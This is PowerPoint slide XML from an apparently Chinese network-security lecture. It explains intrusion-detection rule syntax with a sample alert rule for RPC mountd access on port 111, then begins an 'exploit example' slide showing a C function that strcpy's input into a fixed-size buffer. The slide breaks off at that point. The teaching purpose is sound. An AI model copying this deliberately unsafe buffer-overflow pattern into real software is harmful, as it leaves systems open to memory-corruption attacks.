          <p:cNvPr id="221187" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0184899-04D6-41DB-885C-7730CFAFE091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="2205038"/>
            <a:ext cx="8415338" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>规则描述语言</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>规则是特征模式匹配的依据，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>描述语言易于扩展，功能也比较强大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>每条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>规则必须在一行中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>规则解释器无法对跨行的规则进行解析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>逻辑上由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>规则头和规则选项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>组成。规则头包括：规则行为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>源/目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址、子网掩码、方向以及源/目的端口。规则选项包含报警信息和异常包的信息(特征码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>)，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>使用这些特征码来决定是否采取规则规定的行动。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39933800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8967B89E-ED4E-4A56-9FE6-27E52F4145E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="3357563"/>
            <a:ext cx="8281987" cy="930275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>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585" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2585" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2585" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2585" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2585" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -&gt; 192.168.1.0/24 111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2585" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(content:”|00 01 86 a5|”;msg:”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2585" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mountd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2585" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> access”;)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144387" name="Line 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{678733AF-701F-4ADD-9CB1-D1997D39A41B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3276600" y="2894013"/>
            <a:ext cx="0" cy="596900"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2215"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144388" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E4B1044-79BE-499E-B0D6-C04C27116EAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2411413" y="2414588"/>
            <a:ext cx="1800225" cy="490537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:prstShdw prst="shdw11">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:scheme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zh-CN" altLang="en-US" sz="2585" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>规则头</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144389" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D45A1EFB-61EE-4D75-88FD-41DF740E1CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3779838" y="4156075"/>
            <a:ext cx="0" cy="598488"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000099"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2215"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144390" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E6EDA61-14B7-498B-85DA-B094CD1A4EA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2700338" y="4687888"/>
            <a:ext cx="2087562" cy="490537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:prstShdw prst="shdw11">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:scheme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zh-CN" altLang="en-US" sz="2585" b="1">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
              </a:rPr>
              <a:t>规则选项</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144391" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F754D7C2-8E46-4154-A682-62D0ABBCE2EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3276600" y="1962150"/>
            <a:ext cx="0" cy="531813"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2215"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144392" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42B0D370-EFDE-4E53-BA43-647812FE5A85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="1400175"/>
            <a:ext cx="8424862" cy="433388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:prstShdw prst="shdw11">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:prstShdw>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zh-CN" altLang="en-US" sz="2215" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>规则操作 协议 源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2215" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2215" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 源端口 方向操作符 目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2215" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2215" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 目的端口  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144393" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E8F5577-75C5-4E4F-82A8-61B1748A490A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="5286375"/>
            <a:ext cx="7993062" cy="1527175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="3366FF"/>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215" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>规则含义：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2215" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>任何使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2215" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2215" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>协议连接网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2215" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.0/24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2215" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中任何主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2215" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>111</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2215" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>端口的数据包中，如果出现了二进制数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2215" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00 01 86 a5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2215" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，便发出警告信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2215" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mountd access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1721142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144386">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="FF0000"/>
                                      </p:to>
                                    </p:animClr>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="144387"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144387"/>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44388"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14438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mph" presetSubtype="2" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="18" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144386">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="000099"/>
                                      </p:to>
                                    </p:animClr>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44390"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144390"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="24" presetID="3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="144389"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14438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44391"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14439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44392"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14439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44393"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="144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8" grpId="0"/>
      <p:bldP spid="144390" grpId="0"/>
      <p:bldP spid="144392" grpId="0"/>
      <p:bldP spid="1443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25C9D12E-02BF-49D1-BAE2-B40DB1EF1A37}"/>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36309D2B-22EF-4B16-B484-F6155C7D82FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="2017713"/>
            <a:ext cx="8486775" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>漏洞利用示例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> fun(unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> *data)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>{  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> buffer[BUF_LEN];  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
